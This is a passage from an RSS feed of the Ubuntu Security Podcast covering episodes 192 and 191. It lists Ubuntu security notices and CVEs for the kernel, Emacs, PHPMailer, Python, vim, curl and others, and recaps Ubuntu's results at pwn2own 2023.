<h3 id="usn-5977-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5977-1">USN-5977-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1032">CVE-2023-1032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1281">CVE-2023-1281</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5978-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5978-1">USN-5978-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4842">CVE-2022-4842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4382">CVE-2022-4382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1281">CVE-2023-1281</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5979-1-linux-kernel--hwe--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5979-1">USN-5979-1</a>] Linux kernel (HWE) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1195">CVE-2023-1195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0469">CVE-2023-0469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4382">CVE-2022-4382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42329">CVE-2022-42329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42328">CVE-2022-42328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5980-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5980-1">USN-5980-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4382">CVE-2022-4382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3669">CVE-2021-3669</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5981-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5981-1">USN-5981-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41218">CVE-2022-41218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3424">CVE-2022-3424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3669">CVE-2021-3669</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5982-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5982-1">USN-5982-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>15 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26606">CVE-2023-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23454">CVE-2023-23454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0210">CVE-2023-0210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48424">CVE-2022-48424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48423">CVE-2022-48423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4382">CVE-2022-4382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41218">CVE-2022-41218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3424">CVE-2022-3424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="pwn2own-2023-08-02">pwn2own 2023 [08:02]</h3>
<ul>
<li>pwn2own - part of CanSecWest security conference in Vancouver, Canada</li>
<li>originally started as an informal event, now is organised by Trend&rsquo;s ZDI and
is attended by many of the best offensive security research teams in the world</li>
<li>compete to hack various known targets under various categories</li>
<li>Runs over 3 days</li>
<li>Ubuntu Desktop was a target again this year, in particular in the local user
elevation of privilege category - standard unprivileged user account which can
be used to escalate privileges to root - targeting the latest Ubuntu interim
release 22.10 (Kinetic)</li>
<li>competitors get 3 attempts, each with a time limit of 10 minutes to get their
exploit to work</li>
<li>From our side, we had a team of 4 engineers (Steve Beattie, John Johansen and
Georgia Garcia from the Ubuntu Security team and Thadeu Cascardo from the
Ubuntu Kernel team) who were on call to be shown the exploit and vulnerability
and within 30 minutes would have to determine if it was already known or not</li>
<li>Day 1 saw 2 attempts
<ul>
<li>one unsuccessful, the other was a previously known (but unpatched)</li>
</ul>
</li>
<li>Day 2 saw 1 successful attempt (incorrect pointer scaling issue)</li>
<li>Day 3 saw 3 successful attempts
<ul>
<li>one also previously known, the other two double free and a UAF</li>
</ul>
</li>
<li>In total, 6 separate teams targeted Ubuntu Desktop, 5 were successful, and the
other was not able to get their exploit to work in the allotted time limit
<ul>
<li>Details surrounding all of these vulnerabilities is embargoed for now, but
will become available in the future</li>
<li>Only minor details have been released publicly by ZDI at this time (ie
incorrect pointer scaling, double free and UAF) but all (unsurprisingly)
related to the memory unsafety of C</li>
</ul>
</li>
<li>Interesting to see the macOS was only targeted once (successful), and Windows
11 twice (both successful too) yet Ubuntu had 6</li>
<li>Yet last year, there were 6 for WIndows 11, and 4 for Ubuntu</li>
<li>Is Ubuntu seen as an easy target? Or are there more security researchers
looking at Ubuntu compared to Windows nowadays?</li>
<li>Does the open source nature of Linux make it easier to find vulns since the
source code is easily able to be inspected?</li>
<li>Pace of development of the upstream kernel is quite fast, lots of new
subsystems like <code>io_uring</code> and large attack surfaces through unprivileged user
namespaces perhaps make Ubuntu more of an easy target
<ul>
<li>Part of the motivation to want to restrict access to unprivileged user
namespaces in the future</li>
</ul>
</li>
<li>More details to follow once vulns have been made public</li>
<li>Thanks to Steve, JJ, Georgia and Thadeu</li>
<li><a href="https://www.zerodayinitiative.com/blog/2023/3/22/pwn2own-vancouver-2023-day-one-results">Day 1 Results</a></li>
<li><a href="https://www.zerodayinitiative.com/blog/2023/3/23/pwn2own-vancouver-2023-day-two-results">Day 2 Results</a></li>
<li><a href="https://www.zerodayinitiative.com/blog/2023/3/24/pwn2own-vancouver-2023-day">Day 3 Results</a></li>
</ul>
<h3 id="securing-a-distro-and-you-own-open-source-project-everything-open-2023-14-27">Securing a distro and you own open source project - Everything Open 2023 [14:27]</h3>
<ul>
<li>
<p><a href="https://youtu.be/a-_5aJIjjLQ">https://youtu.be/a-_5aJIjjLQ</a></p>
</li>
<li>
<p>Ubuntu is one of the most popular Linux distributions and is used by millions
of people all over the world. It contains software from a wide array of
different upstream projects and communities across a number of different
language ecosystems. Ubuntu also aims to provide the best user experience for
consuming all these various pieces of software, whilst being both as secure
and usable as possible.</p>
</li>
<li>
<p>The Ubuntu Security team is responsible for keeping all of this software
secure and patched against known vulnerabilities, as well as proactively
looking for new possible security issues, and finally for ensuring the
distribution as a whole is secured through proactive hardening work. They also
have a huge depth of experience in working with upstream open source projects
to report, manage patch and disclose security vulnerabilities. Find out both
how they keep Ubuntu secure and how you can improve the security of your own
open source project or the projects you contribute to.</p>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E192.mp3" length="16326764" type="audio/mpeg" /><itunes:duration>947</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 191
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-191/</link>
          <pubDate>Fri, 24 Mar 2023 13:51:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>dfbe5c94be00c46f75d3817b0fda07bbdfebf4db797bae1b0eea1519f46d83008a54636f60d4f7ab6840e36166379b5a925f1ac97f13c4ec06df3a5852709851</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 191</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week saw the unexpected release of Ubuntu 20.04.6 so we go into the detail
  behind that, plus we talk Everything Open and we cover security updates
  including Emacs, LibreCAD, Python, vim and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week saw the unexpected release of Ubuntu 20.04.6 so we go into the detail
  behind that, plus we talk Everything Open and we cover security updates
  including Emacs, LibreCAD, Python, vim and more.
  </itunes:summary>
        <description>  This week saw the unexpected release of Ubuntu 20.04.6 so we go into the detail
  behind that, plus we talk Everything Open and we cover security updates
  including Emacs, LibreCAD, Python, vim and more.
  </description>
        <googleplay:description>  This week saw the unexpected release of Ubuntu 20.04.6 so we go into the detail
  behind that, plus we talk Everything Open and we cover security updates
  including Emacs, LibreCAD, Python, vim and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week saw the unexpected release of Ubuntu 20.04.6 so we go into the detail
behind that, plus we talk Everything Open and we cover security updates
including Emacs, LibreCAD, Python, vim and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>82 unique CVEs addressed</p>
<h3 id="usn-5955-1-emacs-vulnerability-00-50">[<a href="https://ubuntu.com/security/notices/USN-5955-1">USN-5955-1</a>] Emacs vulnerability [00:50]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48339">CVE-2022-48339</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>htmlfontify package would try and validate whether a given file is text by
calling <code>file</code> on it - but would fail to escape the filename - so if a user
could be tricked into running <code>htmlfontify-copy-and-link-dir</code> on a crafted
directory, could get code execution in the context of emacs</li>
<li>Unlikely to be an issue in practice, also there doesn&rsquo;t appear to be any users
of this function on github (other than references to the documentation for it)</li>
</ul>
<h3 id="usn-5956-1-usn-5956-2-phpmailer-vulnerabilities-02-03">[<a href="https://ubuntu.com/security/notices/USN-5956-1">USN-5956-1</a>, <a href="https://ubuntu.com/security/notices/USN-5956-2">USN-5956-2</a>] PHPMailer vulnerabilities [02:03]</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3603">CVE-2021-3603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13625">CVE-2020-13625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19296">CVE-2018-19296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5223">CVE-2017-5223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11503">CVE-2017-11503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10045">CVE-2016-10045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10033">CVE-2016-10033</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>email sending library for PHP</li>
<li>similarly, possible RCE since could possibly inject commands that would be
passed to the shell when executing the underlying <code>mail</code> command - original
patch didn&rsquo;t fix properly so second CVE was issued for the fix</li>
</ul>
<h3 id="usn-5957-1-librecad-vulnerabilities-02-58">[<a href="https://ubuntu.com/security/notices/USN-5957-1">USN-5957-1</a>] LibreCAD vulnerabilities [02:58]</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45343">CVE-2021-45343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45342">CVE-2021-45342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45341">CVE-2021-45341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21900">CVE-2021-21900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21899">CVE-2021-21899</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21898">CVE-2021-21898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19105">CVE-2018-19105</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption issues when parsing DXF, DWG, DRW or JWW files
<ul>
<li>OOB writes, UAFs, NULL ptr deref - RCE / DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-5855-2-imagemagick-vulnerabilities-03-37">[<a href="https://ubuntu.com/security/notices/USN-5855-2">USN-5855-2</a>] ImageMagick vulnerabilities [03:37]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-44268">CVE-2022-44268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-44267">CVE-2022-44267</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5958-1-ffmpeg-vulnerabilities-03-45">[<a href="https://ubuntu.com/security/notices/USN-5958-1">USN-5958-1</a>] FFmpeg vulnerabilities [03:45]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3965">CVE-2022-3965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3964">CVE-2022-3964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3341">CVE-2022-3341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3109">CVE-2022-3109</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 NULL ptr derefs and 2 OOB reads -&gt; DoS</li>
</ul>
<h3 id="usn-5954-1-firefox-vulnerabilities-03-59">[<a href="https://ubuntu.com/security/notices/USN-5954-1">USN-5954-1</a>] Firefox vulnerabilities [03:59]</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28161">CVE-2023-28161</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28164">CVE-2023-28164</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28160">CVE-2023-28160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25751">CVE-2023-25751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28177">CVE-2023-28177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28176">CVE-2023-28176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28162">CVE-2023-28162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25752">CVE-2023-25752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25750">CVE-2023-25750</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>111.0
<ul>
<li>usual mix of issues for web engines (DoS, info leak across domains, RCE) if
visited a malicious website</li>
<li>memory corruption, plus a few logic issues that could be used to either
cause firefox to leak local information back to the web server or spoof
parts of the UI etc</li>
</ul>
</li>
</ul>
<h3 id="usn-5961-1-abcm2ps-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5961-1">USN-5961-1</a>] abcm2ps vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32436">CVE-2021-32436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32435">CVE-2021-32435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32434">CVE-2021-32434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010069">CVE-2019-1010069</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10771">CVE-2018-10771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10753">CVE-2018-10753</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5962-1-linux-kernel--intel-iotg--vulnerabilities-04-47">[<a href="https://ubuntu.com/security/notices/USN-5962-1">USN-5962-1</a>] Linux kernel (Intel IoTG) vulnerabilities [04:47]</h3>
<ul>
<li>18 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26605">CVE-2023-26605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0468">CVE-2023-0468</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47521">CVE-2022-47521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47520">CVE-2022-47520</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47519">CVE-2022-47519</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47518">CVE-2022-47518</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45869">CVE-2022-45869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4379">CVE-2022-4379</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42329">CVE-2022-42329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42328">CVE-2022-42328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4139">CVE-2022-4139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3545">CVE-2022-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3521">CVE-2022-3521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3435">CVE-2022-3435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3344">CVE-2022-3344</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3169">CVE-2022-3169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0179">CVE-2023-0179</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0461">CVE-2023-0461</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>two high priority issues
<ul>
<li>netfilter mishandling of vlan headers - OOB write -&gt; crash / RCE</li>
<li>UAF in upper-level protocol subsystem - can be triggered by local user -
similarly, crash / RCE</li>
</ul>
</li>
</ul>
<h3 id="usn-5959-1-kerberos-vulnerabilities-05-32">[<a href="https://ubuntu.com/security/notices/USN-5959-1">USN-5959-1</a>] Kerberos vulnerabilities [05:32]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-37750">CVE-2021-37750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36222">CVE-2021-36222</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr derefs -&gt; crash in kerberos daemon -&gt; DoS</li>
</ul>
<h3 id="usn-5960-1-python-vulnerability-05-51">[<a href="https://ubuntu.com/security/notices/USN-5960-1">USN-5960-1</a>] Python vulnerability [05:51]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24329">CVE-2023-24329</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>possibly to bypass blocklists in <code>urllib.parse()</code> simply by prefixing the URL
with a space - blocklisting is not part of upstream functionality but often
would be implemented in application / library logic by first using <code>urlparse()</code>
to parse the given URL - if prefixed with a space then can get <code>urlparse()</code> to
fail to return the correct scheme/hostname - can workaround simply by first
calling <code>strip()</code> on URL - apparently upstream still discussing whether the
current fix is sufficient so watch this space</li>
</ul>
<h3 id="usn-5963-1-vim-vulnerabilities-07-14">[<a href="https://ubuntu.com/security/notices/USN-5963-1">USN-5963-1</a>] Vim vulnerabilities [07:14]</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1264">CVE-2023-1264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1175">CVE-2023-1175</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1170">CVE-2023-1170</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0051">CVE-2023-0051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0433">CVE-2023-0433</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0288">CVE-2023-0288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0054">CVE-2023-0054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0049">CVE-2023-0049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47024">CVE-2022-47024</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>moar vim vulns from bug-bounty - all found via fuzzing of vim - all memory
corruption vulns -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5964-1-curl-vulnerabilities-07-41">[<a href="https://ubuntu.com/security/notices/USN-5964-1">USN-5964-1</a>] curl vulnerabilities [07:41]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-27538">CVE-2023-27538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27536">CVE-2023-27536</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27535">CVE-2023-27535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27534">CVE-2023-27534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27533">CVE-2023-27533</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>various connection reuse issues - eg. would reuse an SSH connection even if
caller had changed an SSH option - similar for FTP.</li>
<li>mishandling of ~ in SFTP could then allow access to unintended files (would
expand even if not the first part of the path)</li>
</ul>
<h3 id="usn-5806-3-ruby-vulnerability-08-43">[<a href="https://ubuntu.com/security/notices/USN-5806-3">USN-5806-3</a>] Ruby vulnerability [08:43]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33621">CVE-2021-33621</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5965-1-tigervnc-vulnerability-08-53">[<a href="https://ubuntu.com/security/notices/USN-5965-1">USN-5965-1</a>] TigerVNC vulnerability [08:53]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26117">CVE-2020-26117</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>when processing a TLS certificate, would store that internally as a
certificate authority - then if client connected to a different server would
use that stored cert as a CA cert to validate the new server - could then
allow a malicious server to impersonate other servers</li>
</ul>
<h3 id="usn-5904-2-sox-regression-09-35">[<a href="https://ubuntu.com/security/notices/USN-5904-2">USN-5904-2</a>] SoX regression [09:35]</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31651">CVE-2022-31651</a> <!-- raw HTML omitted --></li>
